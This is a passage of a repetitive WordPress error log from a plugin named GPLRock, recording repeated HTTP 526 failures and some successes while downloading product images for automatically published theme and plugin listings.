01:03:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/biolife---organic-food-wordpress-theme--rtl-supported--11853.webp for product biolife-organic-food-wordpress-theme-rtl-supported after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:52 UTC] GPLRock WARNING: Image download failed for product biolife-organic-food-wordpress-theme-rtl-supported. URL: https://meldwp.com/wp-content/uploads/biolife---organic-food-wordpress-theme--rtl-supported--11853.webp [05-Apr-2026 01:03:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: biolife-organic-food-wordpress-theme-rtl-supported [05-Apr-2026 01:03:52 UTC] GPLRock: Image download failed for product autopro-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:54 UTC] GPLRock: Image download failed for product autopro-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autopro---car-dealer-wordpress-theme-28466.webp for product autopro-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:03:56 UTC] GPLRock: Image download failed for product autopro-car-dealer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:03:58 UTC] GPLRock: Image download failed for product autopro-car-dealer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autopro---car-dealer-wordpress-theme-28466.webp for product autopro-car-dealer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:04:00 UTC] GPLRock WARNING: Image download failed for product autopro-car-dealer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autopro---car-dealer-wordpress-theme-28466.webp [05-Apr-2026 01:04:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autopro-car-dealer-wordpress-theme [05-Apr-2026 01:04:00 UTC] GPLRock: Image download failed for product angel-fashion-model-agency-wordpress-cms-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:02 UTC] GPLRock: Image download failed for product angel-fashion-model-agency-wordpress-cms-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/angel---fashion-model-agency-wordpress-cms-theme-8256.webp for product angel-fashion-model-agency-wordpress-cms-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:04:05 UTC] GPLRock: Image download failed for product angel-fashion-model-agency-wordpress-cms-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:07 UTC] GPLRock: Image download failed for product angel-fashion-model-agency-wordpress-cms-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/angel---fashion-model-agency-wordpress-cms-theme-8256.webp for product angel-fashion-model-agency-wordpress-cms-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:04:09 UTC] GPLRock WARNING: Image download failed for product angel-fashion-model-agency-wordpress-cms-theme. URL: https://meldwp.com/wp-content/uploads/angel---fashion-model-agency-wordpress-cms-theme-8256.webp [05-Apr-2026 01:04:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: angel-fashion-model-agency-wordpress-cms-theme [05-Apr-2026 01:04:09 UTC] GPLRock: Image download failed for product landmark-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:11 UTC] GPLRock: Image download failed for product landmark-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/landmark---real-estate-wordpress-theme-13770.webp for product landmark-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:04:13 UTC] GPLRock: Image download failed for product landmark-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:16 UTC] GPLRock: Image download failed for product landmark-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/landmark---real-estate-wordpress-theme-13770.webp for product landmark-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:04:18 UTC] GPLRock WARNING: Image download failed for product landmark-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/landmark---real-estate-wordpress-theme-13770.webp [05-Apr-2026 01:04:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: landmark-real-estate-wordpress-theme [05-Apr-2026 01:04:18 UTC] GPLRock: Image download failed for product healthy-living-nutrition-and-wellness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:20 UTC] GPLRock: Image download failed for product healthy-living-nutrition-and-wellness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healthy-living---nutrition-and-wellness-wordpress-theme-22215.webp for product healthy-living-nutrition-and-wellness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:04:22 UTC] GPLRock: Image download failed for product healthy-living-nutrition-and-wellness-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:24 UTC] GPLRock: Image download failed for product healthy-living-nutrition-and-wellness-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:04:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healthy-living---nutrition-and-wellness-wordpress-theme-22215.webp for product healthy-living-nutrition-and-wellness-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:04:26 UTC] GPLRock WARNING: Image download failed for product healthy-living-nutrition-and-wellness-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/healthy-living---nutrition-and-wellness-wordpress-theme-22215.webp [05-Apr-2026 01:04:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: healthy-living-nutrition-and-wellness-wordpress-theme [05-Apr-2026 01:05:03 UTC] GPLRock: Image downloaded successfully for product baha-apps-landing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1fff1b35.webp [05-Apr-2026 01:05:03 UTC] GPLRock: Using pre-downloaded image for product baha-apps-landing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1fff1b35.webp [05-Apr-2026 01:05:03 UTC] GPLRock: Ghost product published with image - Product ID: baha-apps-landing-elementor-template-kit [05-Apr-2026 01:05:05 UTC] GPLRock: Image downloaded successfully for product bagaicha-landscape-gardening-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1006650.webp [05-Apr-2026 01:05:05 UTC] GPLRock: Using pre-downloaded image for product bagaicha-landscape-gardening-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a1006650.webp [05-Apr-2026 01:05:05 UTC] GPLRock: Ghost product published with image - Product ID: bagaicha-landscape-gardening-elementor-template-kit [05-Apr-2026 01:05:06 UTC] GPLRock: Image downloaded successfully for product babypleje-baby-care-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef9a244f.webp [05-Apr-2026 01:05:06 UTC] GPLRock: Using pre-downloaded image for product babypleje-baby-care-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ef9a244f.webp [05-Apr-2026 01:05:06 UTC] GPLRock: Ghost product published with image - Product ID: babypleje-baby-care-services-elementor-template-kit [05-Apr-2026 01:05:08 UTC] GPLRock: Image downloaded successfully for product baby-doctor-pediatric-clinic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dc439aff.webp [05-Apr-2026 01:05:08 UTC] GPLRock: Using pre-downloaded image for product baby-doctor-pediatric-clinic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dc439aff.webp [05-Apr-2026 01:05:08 UTC] GPLRock: Ghost product published with image - Product ID: baby-doctor-pediatric-clinic-elementor-template-kit [05-Apr-2026 01:05:09 UTC] GPLRock: Image downloaded successfully for product azir-finance-consulting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f59d0e1.webp [05-Apr-2026 01:05:09 UTC] GPLRock: Using pre-downloaded image for product azir-finance-consulting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f59d0e1.webp [05-Apr-2026 01:05:09 UTC] GPLRock: Ghost product published with image - Product ID: azir-finance-consulting-elementor-template-kit [05-Apr-2026 01:05:10 UTC] GPLRock: Image downloaded successfully for product ayoo-beauty-salon-services-elementor-template-kits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-794d46bc.webp [05-Apr-2026 01:05:10 UTC] GPLRock: Using pre-downloaded image for product ayoo-beauty-salon-services-elementor-template-kits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-794d46bc.webp [05-Apr-2026 01:05:10 UTC] GPLRock: Ghost product published with image - Product ID: ayoo-beauty-salon-services-elementor-template-kits [05-Apr-2026 01:05:12 UTC] GPLRock: Image downloaded successfully for product axial-construction-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff0818f8.jpg [05-Apr-2026 01:05:12 UTC] GPLRock: Using pre-downloaded image for product axial-construction-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ff0818f8.jpg [05-Apr-2026 01:05:12 UTC] GPLRock: Ghost product published with image - Product ID: axial-construction-company-elementor-template-kit [05-Apr-2026 01:05:14 UTC] GPLRock: Image downloaded successfully for product avviare-start-up-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0d7d94f.webp [05-Apr-2026 01:05:14 UTC] GPLRock: Using pre-downloaded image for product avviare-start-up-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0d7d94f.webp [05-Apr-2026 01:05:14 UTC] GPLRock: Ghost product published with image - Product ID: avviare-start-up-business-elementor-template-kit [05-Apr-2026 01:05:15 UTC] GPLRock: Image downloaded successfully for product avontur-modern-tour-travel-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c1b3117c.webp [05-Apr-2026 01:05:15 UTC] GPLRock: Using pre-downloaded image for product avontur-modern-tour-travel-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c1b3117c.webp [05-Apr-2026 01:05:15 UTC] GPLRock: Ghost product published with image - Product ID: avontur-modern-tour-travel-elementor-template-kit [05-Apr-2026 01:05:16 UTC] GPLRock: Image downloaded successfully for product avila-electronic-woocommerce-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d71cbd1d.webp [05-Apr-2026 01:05:16 UTC] GPLRock: Using pre-downloaded image for product avila-electronic-woocommerce-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d71cbd1d.webp [05-Apr-2026 01:05:16 UTC] GPLRock: Ghost product published with image - Product ID: avila-electronic-woocommerce-elementor-template-kit [05-Apr-2026 01:06:47 UTC] GPLRock: Image download failed for product woocommerce-min-max-quantity-step-control (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:06:49 UTC] GPLRock: Image download failed for product woocommerce-min-max-quantity-step-control (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:06:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-min-max-quantity--step-control-26864.webp for product woocommerce-min-max-quantity-step-control after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:06:51 UTC] GPLRock: Image download failed for product woocommerce-min-max-quantity-step-control (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:06:53 UTC] GPLRock: Image download failed for product woocommerce-min-max-quantity-step-control (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:06:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-min-max-quantity--step-control-26864.webp for product woocommerce-min-max-quantity-step-control after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:06:55 UTC] GPLRock WARNING: Image download failed for product woocommerce-min-max-quantity-step-control. URL: https://meldwp.com/wp-content/uploads/woocommerce-min-max-quantity--step-control-26864.webp [05-Apr-2026 01:06:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-min-max-quantity-step-control [05-Apr-2026 01:06:56 UTC] GPLRock: Image downloaded successfully for product airbnb-property-availability-checker-forms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3083029b.webp [05-Apr-2026 01:06:56 UTC] GPLRock: Using pre-downloaded image for product airbnb-property-availability-checker-forms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3083029b.webp [05-Apr-2026 01:06:56 UTC] GPLRock: Ghost product published with image - Product ID: airbnb-property-availability-checker-forms [05-Apr-2026 01:06:56 UTC] GPLRock: Image download failed for product audio-player-statistics-addon-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:06:58 UTC] GPLRock: Image download failed for product audio-player-statistics-addon-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/audio-player-statistics-addon-for-wordpress-23357.webp for product audio-player-statistics-addon-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:07:00 UTC] GPLRock: Image download failed for product audio-player-statistics-addon-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:02 UTC] GPLRock: Image download failed for product audio-player-statistics-addon-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/audio-player-statistics-addon-for-wordpress-23357.webp for product audio-player-statistics-addon-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:07:04 UTC] GPLRock WARNING: Image download failed for product audio-player-statistics-addon-for-wordpress. URL: https://meldwp.com/wp-content/uploads/audio-player-statistics-addon-for-wordpress-23357.webp [05-Apr-2026 01:07:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: audio-player-statistics-addon-for-wordpress [05-Apr-2026 01:07:04 UTC] GPLRock: Image download failed for product dating-app-web-version-ios-and-android-apps (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:07 UTC] GPLRock: Image download failed for product dating-app-web-version-ios-and-android-apps (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dating-app---web-version-ios-and-android-apps-2012.webp for product dating-app-web-version-ios-and-android-apps after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:07:09 UTC] GPLRock: Image download failed for product dating-app-web-version-ios-and-android-apps (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:11 UTC] GPLRock: Image download failed for product dating-app-web-version-ios-and-android-apps (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dating-app---web-version-ios-and-android-apps-2012.webp for product dating-app-web-version-ios-and-android-apps after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:07:13 UTC] GPLRock WARNING: Image download failed for product dating-app-web-version-ios-and-android-apps. URL: https://meldwp.com/wp-content/uploads/dating-app---web-version-ios-and-android-apps-2012.webp [05-Apr-2026 01:07:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dating-app-web-version-ios-and-android-apps [05-Apr-2026 01:07:13 UTC] GPLRock: Image downloaded successfully for product omniprice-prestashop-omnibus-directive-compatibility-module (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-419a5562.webp [05-Apr-2026 01:07:13 UTC] GPLRock: Using pre-downloaded image for product omniprice-prestashop-omnibus-directive-compatibility-module: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-419a5562.webp [05-Apr-2026 01:07:13 UTC] GPLRock: Ghost product published with image - Product ID: omniprice-prestashop-omnibus-directive-compatibility-module [05-Apr-2026 01:07:13 UTC] GPLRock: Image download failed for product marketplace-multi-currency-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:15 UTC] GPLRock: Image download failed for product marketplace-multi-currency-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marketplace-multi-currency-plugin-for-woocommerce-7816.webp for product marketplace-multi-currency-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:07:18 UTC] GPLRock: Image download failed for product marketplace-multi-currency-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:20 UTC] GPLRock: Image download failed for product marketplace-multi-currency-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marketplace-multi-currency-plugin-for-woocommerce-7816.webp for product marketplace-multi-currency-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:07:22 UTC] GPLRock WARNING: Image download failed for product marketplace-multi-currency-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/marketplace-multi-currency-plugin-for-woocommerce-7816.webp [05-Apr-2026 01:07:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: marketplace-multi-currency-plugin-for-woocommerce [05-Apr-2026 01:07:22 UTC] GPLRock: Image download failed for product gravity-forms-encrypted-fields (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:24 UTC] GPLRock: Image download failed for product gravity-forms-encrypted-fields (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-encrypted-fields-12847.webp for product gravity-forms-encrypted-fields after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:07:26 UTC] GPLRock: Image download failed for product gravity-forms-encrypted-fields (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:28 UTC] GPLRock: Image download failed for product gravity-forms-encrypted-fields (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-encrypted-fields-12847.webp for product gravity-forms-encrypted-fields after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:07:30 UTC] GPLRock WARNING: Image download failed for product gravity-forms-encrypted-fields. URL: https://meldwp.com/wp-content/uploads/gravity-forms-encrypted-fields-12847.webp [05-Apr-2026 01:07:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gravity-forms-encrypted-fields [05-Apr-2026 01:07:31 UTC] GPLRock: Image download failed for product quickbooksintuit-payment-api-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:33 UTC] GPLRock: Image download failed for product quickbooksintuit-payment-api-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:07:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/quickbooksintuit-payment-api-gateway-for-woocommerce-5458.webp for product quickbooksintuit-payment-api-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:07:35 UTC] GPLRock: Image download failed for product quickbooksintuit-payment-api-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:16:55 UTC] GPLRock: Image download failed for product woocommerce-products-gallery-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:16:57 UTC] GPLRock: Image download failed for product woocommerce-products-gallery-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:16:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-gallery-for-elementor-wordpress-plugin-18885.webp for product woocommerce-products-gallery-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:16:59 UTC] GPLRock: Image download failed for product woocommerce-products-gallery-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:01 UTC] GPLRock: Image download failed for product woocommerce-products-gallery-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-products-gallery-for-elementor-wordpress-plugin-18885.webp for product woocommerce-products-gallery-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:03 UTC] GPLRock WARNING: Image download failed for product woocommerce-products-gallery-for-elementor-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-products-gallery-for-elementor-wordpress-plugin-18885.webp [05-Apr-2026 01:17:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-products-gallery-for-elementor-wordpress-plugin [05-Apr-2026 01:17:04 UTC] GPLRock: Image download failed for product menu-editor-by-wp-adminify (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:06 UTC] GPLRock: Image download failed for product menu-editor-by-wp-adminify (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/menu-editor-by-wp-adminify-11057.webp for product menu-editor-by-wp-adminify after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:08 UTC] GPLRock: Image download failed for product menu-editor-by-wp-adminify (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:10 UTC] GPLRock: Image download failed for product menu-editor-by-wp-adminify (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/menu-editor-by-wp-adminify-11057.webp for product menu-editor-by-wp-adminify after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:12 UTC] GPLRock WARNING: Image download failed for product menu-editor-by-wp-adminify. URL: https://meldwp.com/wp-content/uploads/menu-editor-by-wp-adminify-11057.webp [05-Apr-2026 01:17:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: menu-editor-by-wp-adminify [05-Apr-2026 01:17:13 UTC] GPLRock: Image download failed for product amy-slider-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:15 UTC] GPLRock: Image download failed for product amy-slider-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amy-slider-for-visual-composer-26930.webp for product amy-slider-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:17 UTC] GPLRock: Image download failed for product amy-slider-for-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:19 UTC] GPLRock: Image download failed for product amy-slider-for-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amy-slider-for-visual-composer-26930.webp for product amy-slider-for-visual-composer after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:21 UTC] GPLRock WARNING: Image download failed for product amy-slider-for-visual-composer. URL: https://meldwp.com/wp-content/uploads/amy-slider-for-visual-composer-26930.webp [05-Apr-2026 01:17:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amy-slider-for-visual-composer [05-Apr-2026 01:17:21 UTC] GPLRock: Image downloaded successfully for product broadcasting-extension-for-flow-flow-social-stream (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b3ea700.webp [05-Apr-2026 01:17:21 UTC] GPLRock: Using pre-downloaded image for product broadcasting-extension-for-flow-flow-social-stream: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8b3ea700.webp [05-Apr-2026 01:17:21 UTC] GPLRock: Ghost product published with image - Product ID: broadcasting-extension-for-flow-flow-social-stream [05-Apr-2026 01:17:21 UTC] GPLRock: Image download failed for product woocommerce-payment-gateways-reporting-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:24 UTC] GPLRock: Image download failed for product woocommerce-payment-gateways-reporting-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-payment-gateways-reporting-system-13778.webp for product woocommerce-payment-gateways-reporting-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:26 UTC] GPLRock: Image download failed for product woocommerce-payment-gateways-reporting-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:28 UTC] GPLRock: Image download failed for product woocommerce-payment-gateways-reporting-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-payment-gateways-reporting-system-13778.webp for product woocommerce-payment-gateways-reporting-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:30 UTC] GPLRock WARNING: Image download failed for product woocommerce-payment-gateways-reporting-system. URL: https://meldwp.com/wp-content/uploads/woocommerce-payment-gateways-reporting-system-13778.webp [05-Apr-2026 01:17:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-payment-gateways-reporting-system [05-Apr-2026 01:17:30 UTC] GPLRock: Image download failed for product sticky-html5-music-player-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:32 UTC] GPLRock: Image download failed for product sticky-html5-music-player-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sticky-html5-music-player-wordpress-plugin-5444.webp for product sticky-html5-music-player-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:34 UTC] GPLRock: Image download failed for product sticky-html5-music-player-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:37 UTC] GPLRock: Image download failed for product sticky-html5-music-player-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sticky-html5-music-player-wordpress-plugin-5444.webp for product sticky-html5-music-player-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:39 UTC] GPLRock WARNING: Image download failed for product sticky-html5-music-player-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/sticky-html5-music-player-wordpress-plugin-5444.webp [05-Apr-2026 01:17:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sticky-html5-music-player-wordpress-plugin [05-Apr-2026 01:17:39 UTC] GPLRock: Image download failed for product nexo-print-server (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:41 UTC] GPLRock: Image download failed for product nexo-print-server (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nexo-print-server-5186.webp for product nexo-print-server after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 01:17:43 UTC] GPLRock: Image download failed for product nexo-print-server (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 01:17:45 UTC] GPLRock: Image download failed for product nexo-print-server (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 